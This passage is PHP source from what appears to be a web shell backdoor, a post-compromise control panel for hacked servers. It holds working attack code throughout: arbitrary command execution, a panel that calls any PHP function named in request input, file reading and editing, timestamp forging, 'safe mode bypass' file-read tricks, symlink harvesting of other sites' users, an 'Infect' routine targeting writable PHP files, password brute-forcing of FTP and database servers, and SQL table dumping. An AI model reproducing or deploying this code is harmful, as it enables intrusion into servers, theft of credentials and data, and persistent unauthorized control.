540 $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'bin2hex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', );
541 if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
542 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);
543}else{g(null,null,this.selectTool.value,this.input.value);
544} return false;
545'><select name='selectTool'>";
546 foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
547 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;
548':'')."margin-top:5px' id='strOutput'>";
549 if(!empty($_POST['p1'])) { if(function_exists($_POST['p1'])) echo htmlspecialchars($_POST['p1']($_POST['p2']));
550 } echo"</pre></div>";
551
552?>
553 <br><h1>Search for hash:</h1><div class=content>
554 <form method='post' target='_blank' name="hf">
555 <input type="text" name="hash" style="width:200px;
556"><br>
557 <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';
558document.hf.submit()"><br>
559 <input type="button" value="fakenamegenerator.com" onclick="document.hf.action='http://www.fakenamegenerator.com/';
560document.hf.submit()"><br>
561 <input type="button" value="tools4noobs.com" onclick="document.hf.action='http://www.tools4noobs.com/online_php_functions/';
562document.hf.submit()"><br>
563 <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';
564document.hf.submit()"><br>
565 <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';
566document.hf.submit()"><br>
567 </form>
568 </div>
569
570<?php printFooter();
571 } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']);
572 if(@$_POST['p2']=='download') { if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096);
573 header("Content-Disposition: attachment;
574 filename=".basename($_POST['p1']));
575 if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']);
576 header("Content-Type: ".$type);
577 } $fp = @fopen($_POST['p1'], "r");
578 if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);
579 fclose($fp);
580 } } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { } exit;
581 } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w');
582 if($fp) { $_POST['p2'] = "edit";
583 fclose($fp);
584 } } } printHeader();
585 echo '<h1>File tools</h1><div class=content>';
586 if( !file_exists(@$_POST['p1']) ) { echo 'File not exists';
587 printFooter();
588 return;
589 } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
590 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
591 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
592 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
593 if( empty($_POST['p2']) ) $_POST['p2'] = 'view';
594 if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
595 else $m = array('Chmod', 'Rename', 'Touch');
596 foreach($m as $v) echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
597 echo '<br><br>';
598 switch($_POST['p2']) { case 'view': echo '<pre class=ml1>';
599 $fp = @fopen($_POST['p1'], 'r');
600 if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));
601 @fclose($fp);
602 } echo '</pre>';
603 break;
604 case 'highlight': if( is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;
605color:black;
606">';
607 $code = highlight_file($_POST['p1'],true);
608 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
609 } break;
610 case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0;
611 for($i=strlen($_POST['p3'])-1;
612$i>=0;
613--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
614 if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";
615</script>';
616 else die('<script>g(null,null,null,null,"")</script>');
617 } echo '<form onsubmit="g(null,null,null,null,this.chmod.value);
618return false;
619"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
620 break;
621 case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable';
622 break;
623 } if( !empty($_POST['p3']) ) { @file_put_contents($_POST['p1'],$_POST['p3']);
624 echo 'Saved!<br><script>document.mf.p3.value="";
625</script>';
626 } echo '<form onsubmit="g(null,null,null,null,this.text.value);
627return false;
628"><textarea name=text class=bigarea>';
629 $fp = @fopen($_POST['p1'], 'r');
630 if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));
631 @fclose($fp);
632 } echo '</textarea><input type=submit value=">>"></form>';
633 break;
634 case 'hexdump': $c = @file_get_contents($_POST['p1']);
635 $n = 0;
636 $h = array('00000000<br>','','');
637 $len = strlen($c);
638 for ($i=0;
639 $i<$len;
640 ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' ';
641 switch ( ord($c[$i]) ) { case 0: $h[2] .= ' ';
642 break;
643 case 9: $h[2] .= ' ';
644 break;
645 case 10: $h[2] .= ' ';
646 break;
647 case 13: $h[2] .= ' ';
648 break;
649 default: $h[2] .= $c[$i];
650 break;
651 } $n++;
652 if ($n == 32) { $n = 0;
653 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';
654} $h[1] .= '<br>';
655 $h[2] .= "\n";
656 } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;
657"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
658 break;
659 case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br><script>document.mf.p3.value="";
660</script>';
661 else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
662 } echo '<form onsubmit="g(null,null,null,null,this.name.value);
663return false;
664"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
665 break;
666 case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']);
667 if($time) { if(@touch($_POST['p1'],$time,$time)) die('<script>g(null,null,null,null,"")</script>');
668 else { echo 'Fail!<script>document.mf.p3.value="";
669</script>';
670 } } else echo 'Bad time format!<script>document.mf.p3.value="";
671</script>';
672 } echo '<form onsubmit="g(null,null,null,null,this.touch.value);
673return false;
674"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
675 break;
676 case 'mkfile': break;
677 } echo '</div>';
678 printFooter();
679 } function actionSafeMode() { $temp='';
680 ob_start();
681 switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx');
682 if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp);
683 unlink($temp);
684 } else echo 'Sorry... Can\'t open file';
685 break;
686 case 2: $files = glob($_POST['p2'].'*');
687 if( is_array($files) ) foreach ($files as $filename) echo $filename."\n";
688 break;
689 case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
690 curl_exec($ch);
691 break;
692 case 4: ini_restore("safe_mode");
693 ini_restore("open_basedir");
694 include($_POST['p2']);
695 break;
696 case 5: for(;
697$_POST['p2'] <= $_POST['p3'];
698$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']);
699 if ($uid) echo join(':',$uid)."\n";
700 } break;
701 case 6: if(!function_exists('imap_open'))break;
702 $stream = imap_open($_POST['p2'], "", "");
703 if ($stream == FALSE) break;
704 echo imap_body($stream, 1);
705 imap_close($stream);
706 break;
707 } $temp = ob_get_clean();
708 printHeader();
709 echo '<h1>Safe mode bypass</h1><div class=content>';
710 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);
711return false;
712\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);
713return false;
714\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);
715return false;
716\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);
717return false;
718\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);
719return false;
720\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);
721return false;
722\'><input type=text name=param><input type=submit value=">>"></form>';
723 if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
724 echo '</div>';
725 printFooter();
726 } function actionConsole() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
727 ob_start();
728 echo "document.cf.cmd.value='';
729\n";
730 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
731 if(preg_match("!.*cd\s+([^;
732]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd();
733 echo "document.mf.c.value='".$GLOBALS['cwd']."';
734";
735 } } echo "document.cf.output.value+='".$temp."';
736";
737 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;
738";
739 $temp = ob_get_clean();
740 echo strlen($temp), "\n", $temp;
741 exit;
742 } printHeader();
743
744?>
745<script>
746if(window.Event) window.captureEvents(Event.KEYDOWN);
747var cmds = new Array("");
748var cur = 0;
749function kp(e) {
750 var n = (window.Event) ? e.which : e.keyCode;
751 if(n == 38) {
752 cur--;
753 if(cur>=0)
754 document.cf.cmd.value = cmds[cur];
755 else
756 cur++;
757 } else if(n == 40) {
758 cur++;
759 if(cur < cmds.length)
760 document.cf.cmd.value = cmds[cur];
761 else
762 cur--;
763 }
764}
765function add(cmd) {
766 cmds.pop();
767 cmds.push(cmd);
768 cmds.push("");
769 cur = cmds.length-1;
770}
771</script>
772
773<?php echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';
774document.cf.cmd.value=\'\';
775return false;
776}add(this.cmd.value);
777if(this.ajax.checked){a(null,null,this.cmd.value);
778}else{g(null,null,this.cmd.value);
779} return false;
780"><select name=alias>';
781 foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
782 continue;
783 } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
784 } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
785 echo '</select><input type=button onclick="add(document.cf.alias.value);
786if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);
787}else{g(null,null,document.cf.alias.value);
788}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;
789margin:0;
790" readonly>';
791 if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
792 } echo '</textarea><input type=text name=cmd style="border-top:0;
793width:100%;
794margin:0;
795" onkeydown="kp(event);
796">';
797 echo '</form></div><script>document.cf.cmd.focus();
798</script>';
799 printFooter();
800 } function actionLogout() { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
801 echo 'bye!';
802 } function actionSelfRemove() { printHeader();
803 if($_POST['p1'] == 'yes') { if(@unlink(SELF_PATH)) die('Shell has been removed');
804 else echo 'unlink error!';
805 } echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
806 printFooter();
807 } function actionTools() { printHeader();
808 printFooter();
809 } function actionDomains() { printHeader();
810 error_reporting(0);
811 echo "<title>#Domains & Users</title>";
812 mkdir("sym");
813 symlink("/","0/x.txt");
814 $c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
815 $f = fopen ('sym/.htaccess','w');
816 fwrite($f , $c);
817 $d0mains = @file("/etc/named.conf");
818 if(!$d0mains){ die("<b>#Error... -> [ /etc/named.conf ]");
819 } echo "<table align=center border=1>
820<tr bgcolor=teal><td>Domain</td><td>User List </td><td>Symlink</td></tr>";
821 foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains);
822 flush();
823 if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
824 echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td><td><a href='sym/x.txt/home/".$user['name']."/public_html'>Miremos</a></td></tr>";
825 flush();
826 }}} echo "</table>
827<p align='center'>
828FailRoot'Cod3rz <a href='http://failroot.wordpress.com/'>FailRoot-Sec.Com</a> | <a
829href='http://wWw.sEc4EvEr.CoM/'>wWw.sEc4EvEr.CoM</a><br>
830</p>
831";
832 printFooter();
833 } function actionInfect() { printHeader();
834 echo '<h1>Infect</h1><div class=content>';
835 if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT'];
836 function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array();
837 $inner_files = Array();
838 while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file);
839 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
840 } else { array_push($files, $dir . "/" . $file);
841 } } } closedir($dh);
842 return $files;
843 } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4);
844 if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file<br>";
845 $i++;
846 } } } echo "<font color=red size=14>$i</font>";
847 }else{ echo "<form method=post><input type=submit value=Infect name=infet></form>";
848 echo 'Really want to infect the server?
849<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
850 } printFooter();
851 } function actionBruteforce() { printHeader();
852 if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
853 if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21);
854 if(!$fp) return false;
855 $res = @ftp_login($fp, $login, $pass);
856 @ftp_close($fp);
857 return $res;
858 } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
859 @mysql_close($res);
860 return $res;
861 } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
862 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
863 @pg_close($res);
864 return $res;
865 } } $success = 0;
866 $attempts = 0;
867 $server = explode(":", $_POST['server']);
868 if($_POST['type'] == 1) { $temp = @file('/etc/passwd');
869 if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line);
870 ++$attempts;
871 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++;
872 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
873 } if(@$_POST['reverse']) { $tmp = "";
874 for($i=strlen($line[0])-1;
875 $i>=0;
876 --$i) $tmp .= $line[0][$i];
877 ++$attempts;
878 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++;
879 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
880 } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']);
881 if( is_array($temp) ) foreach($temp as $line) { $line = trim($line);
882 ++$attempts;
883 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++;
884 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
885 } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
886 } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="root"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
887 echo '</div><br>';
888 printFooter();
889 } function actionSql() { class DbClass { var $type;
890 var $link;
891 var $res;
892 function DbClass($type) { $this->type = $type;
893 } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
894 break;
895 case 'pgsql': $host = explode(':', $host);
896 if(!$host[1]) $host[1]=5432;
897 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
898 break;
899 } return false;
900 } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true;
901 break;
902 } return false;
903 } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str);
904 break;
905 case 'pgsql': return $this->res = @pg_query($this->link,$str);
906 break;
907 } return false;
908 } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;
909 switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res);
910 break;
911 case 'pgsql': return @pg_fetch_assoc($res);
912 break;
913 } return false;
914 } function listDbs() { switch($this->type) { case 'mysql': return $this->res = @mysql_list_dbs($this->link);
915 break;
916 case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database");
917 break;
918 } return false;
919 } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES');
920 break;
921 case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
922 break;
923 } return false;
924 } function error() { switch($this->type) { case 'mysql': return @mysql_error($this->link);
925 break;
926 case 'pgsql': return @pg_last_error($this->link);
927 break;
928 } return false;
929 } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
930 else $this->query('SET CHARSET '.$str);
931 break;
932 case 'mysql': return @pg_set_client_encoding($this->link, $str);
933 break;
934 } return false;
935 } function dump($table) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
936 $create = mysql_fetch_array($res);
937 echo $create[1].";
938\n\n";
939 $this->query('SELECT * FROM `'.$table.'`');
940 while($item = $this->fetch()) { $columns = array();
941 foreach($item as $k=>$v) { $item[$k] = "'".@mysql_real_escape_string($v)."'";
942 $columns[] = "`".$k."`";
943 } echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');
944'."\n";
945 } break;
946 case 'pgsql': $this->query('SELECT * FROM '.$table);
947 while($item = $this->fetch()) { $columns = array();
948 foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'";
949 $columns[] = $k;
950 } echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');
951'."\n";
952 } break;
953 } return false;
954 } };
955 $db = new DbClass($_POST['type']);
956 if(@$_POST['p2']=='download') { ob_start("ob_gzhandler", 4096);
957 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
958 $db->selectdb($_POST['sql_base']);
959 header("Content-Disposition: attachment;
960 filename=dump.sql");
961 header("Content-Type: text/plain");
962 foreach($_POST['tbl'] as $v) $db->dump($v);
963 exit;
964 } printHeader();
965
966?>
967 <h1>Sql browser</h1><div class=content>
968 <form name="sf" method="post">
969 <table cellpadding="2" cellspacing="0">
970 <tr>
971 <td>Type</td>
972 <td>Host</td>
973 <td>Login</td>
974 <td>Password</td>
975 <td>Database</td>
976 <td></td>
977 </tr>
978 <tr>
979 <input type=hidden name=a value=Sql>
980 <input type=hidden name=p1 value='query'>
981 <input type=hidden name=p2>
982 <input type=hidden name=c value='
983<?php echo htmlspecialchars($GLOBALS['cwd']);
984
985?>'>
986 <input type=hidden name=charset value='
987<?php echo isset($_POST['charset'])?$_POST['charset']:''
988?>'>
989 <td>
990 <select name='type'>
991 <option value="mysql"
992<?php if(@$_POST['type']=='mysql')echo 'selected';
993
994?>>MySql</option>
995 <option value="pgsql"
996<?php if(@$_POST['type']=='pgsql')echo 'selected';
997
998?>>PostgreSql</option>
999 </select></td>
1000 <td><input type=text name=sql_host value='
1001<?php echo (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));
1002
1003?>'></td>
1004 <td><input type=text name=sql_login value='
1005<?php echo (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));
1006
1007?>'></td>
1008 <td><input type=text name=sql_pass value='
1009<?php echo (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));
1010
1011?>'></td>
1012 <td>
1013
1014<?php $tmp = "<input type=text name=sql_base value=''>";
1015 if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251');
1016 break;
1017 case "UTF-8": $db->setCharset('utf8');
1018 break;
1019 case "KOI8-R": $db->setCharset('koi8r');
1020 break;
1021 case "KOI8-U": $db->setCharset('koi8u');
1022 break;
1023 case "cp866": $db->setCharset('cp866');
1024 break;
1025 } $db->listDbs();
1026 echo "<select name=sql_base><option value=''></option>";
1027 while($item = $db->fetch()) { list($key, $value) = each($item);
1028 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1029 } echo '</select>';
1030 } else echo $tmp;
1031 }else echo $tmp;
1032
1033?></td>
1034 <td><input type=submit value=">>"></td>
1035 </tr>
1036 </table>
1037 <script>
1038 function st(t,l) {
1039 document.sf.p1.value = 'select';
1040 document.sf.p2.value = t;
1041 if(l!=null)document.sf.p3.value = l;
1042 document.sf.submit();
1043 }
1044 function is() {
1045 for(i=0;
1046i<document.sf.elements['tbl[]'].length;
1047++i)
1048 document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
1049 }
1050 </script>
1051
1052<?php if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1053 if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']);
1054 echo "<tr><td width=1 style='border-top:2px solid #666;
1055border-right:2px solid #666;
1056'><span>Tables:</span><br><br>";
1057 $tbls_res = $db->listTables();
1058 while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);
1059 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1060 $value = htmlspecialchars($value);
1061 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>
1062<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1063 } echo "<input type='checkbox' onclick='is();
1064'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";
1065document.sf.submit();
1066'></td><td style='border-top:2px solid #666;
1067'>";
1068 if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query';
1069 $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1070 $num = $db->fetch();
1071 $num = $num['n'];
1072 echo "<span>".$_POST['p2']."</span> ($num) ";
1073 for($i=0;
1074$i<($num/30);
1075$i++) if($i != (int)$_POST['p3']) echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1076 else echo ($i+1)," ";
1077 if($_POST['type']=='pgsql') $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1078 else $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1079 echo "<br><br>";
1080 } if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { $db->query(@$_POST['p3']);
1081 if($db->res !== false) { $title = false;
1082 echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1083 $line = 1;
1084 while($item = $db->fetch()) { if(!$title) { echo '<tr>';
1085 foreach($item as $key => $value) echo '<th>'.$key.'</th>';
1086 reset($item);
1087 $title=true;
1088 echo '</tr><tr>';
1089 $line = 2;
1090 } echo '<tr class="l'.$line.'">';
1091 $line = $line==1?2:1;
1092 foreach($item as $key => $value) { if($value == null) echo '<td><i>null</i></td>';
1093 else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1094 } echo '</tr>';
1095 } echo '</table>';
1096 } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1097 } } echo "<br><textarea name='p3' style='width:100%;
1098height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1099 echo "</td></tr>";
1100 } echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";
1101document.sf.p2.value=this.f.value;
1102document.sf.submit();
1103return false;
1104'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1105 if(@$_POST['p1'] == 'loadfile') { $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1106 $file = $db->fetch();
1107 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1108 } } echo '</div>';
1109 printFooter();
1110 } function actionNetwork() { printHeader();
1111 $back_connect_c="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";
1112 $back_connect_p="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";
1113 $bind_port_c="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";
